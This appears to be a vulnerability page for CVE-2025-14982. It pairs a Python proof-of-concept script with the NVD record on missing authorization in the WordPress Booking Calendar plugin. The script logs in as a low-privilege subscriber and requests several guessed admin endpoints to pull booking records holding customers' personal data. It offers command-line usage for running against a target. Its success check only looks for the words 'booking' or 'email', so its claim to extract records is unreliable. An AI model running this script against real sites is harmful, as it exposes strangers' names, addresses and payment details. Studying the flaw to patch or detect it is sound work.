CVE-2025-14982

# CVE-2025-14982 PoC - WordPress Booking Calendar Unauthorized Access # This PoC demonstrates the missing authorization vulnerability in Booking Calendar plugin import requests import sys from urllib.parse import urljoin def exploit_booking_calendar(target_url, username, password): """ Exploit the missing authorization vulnerability in WordPress Booking Calendar plugin. Requires only subscriber-level access to extract all booking records. """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account (subscriber role) login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print('[-] Login failed') return None print('[+] Login successful with subscriber account') # Step 2: Access booking listing page without proper authorization check # The vulnerable endpoint is typically found in the admin area booking_urls = [ '/wp-admin/admin.php?page=wpbc&view_mode=listing', '/wp-admin/admin.php?page=bookings&tab=listing', '/?wpbc_ajax=1&action=wpbc_get_bookings' ] for booking_url in booking_urls: full_url = urljoin(target_url, booking_url) response = session.get(full_url) # Check if we can access booking data if 'booking' in response.text.lower() or 'email' in response.text: print(f'[+] Successfully accessed booking data at: {full_url}') print(f'[+] Response contains booking records with PII') return response.text print('[-] Could not extract booking data') return None if __name__ == '__main__': if len(sys.argv) < 4: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>') print(f'Example: python {sys.argv[0]} http://example.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_booking_calendar(target, user, pwd)

{"cve": {"id": "CVE-2025-14982", "sourceIdentifier": "[email protected]", "published": "2026-01-16T05:16:12.483", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Booking Calendar plugin for WordPress is vulnerable to Missing Authorization leading to Sensitive Information Exposure in all versions up to, and including, 10.14.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view all booking records in the database, including personally identifiable information (PII) such as names, email addresses, phone numbers, physical addresses, payment status, booking costs, and booking hashes belonging to other users."}, {"lang": "es", "value": "El plugin Booking Calendar para WordPress es vulnerable a una falta de autorización, lo que lleva a la exposición de información sensible en todas las versiones hasta la 10.14.11, inclusive. Esto permite a atacantes autenticados, con acceso de nivel Suscriptor y superior, ver todos los registros de reservas en la base de datos, incluyendo información de identificación personal (PII) como nombres, direcciones de correo electrónico, números de teléfono, direcciones físicas, estado de pago, costos de reserva y hashes de reserva pertenecientes a otros usuarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/booking/trunk/core/any/class-admin-menu.php#L22", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/booking/trunk/core/wpbc-activation.php#L661", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__listing.php#L150", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__listing.php#L158", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__sql.php#L722", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/booking/trunk/includes/page-bookings/bookings__sql.php#L918", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fbooking&old=3436482&new_path=%2Fbooking&new=3436482&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432649%40booking%2Ftrunk&old=3416518%40booking%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/161d92e3-d255-4967-9449-be263a46bec8?source=cve", "source": "[email protected]"}]}}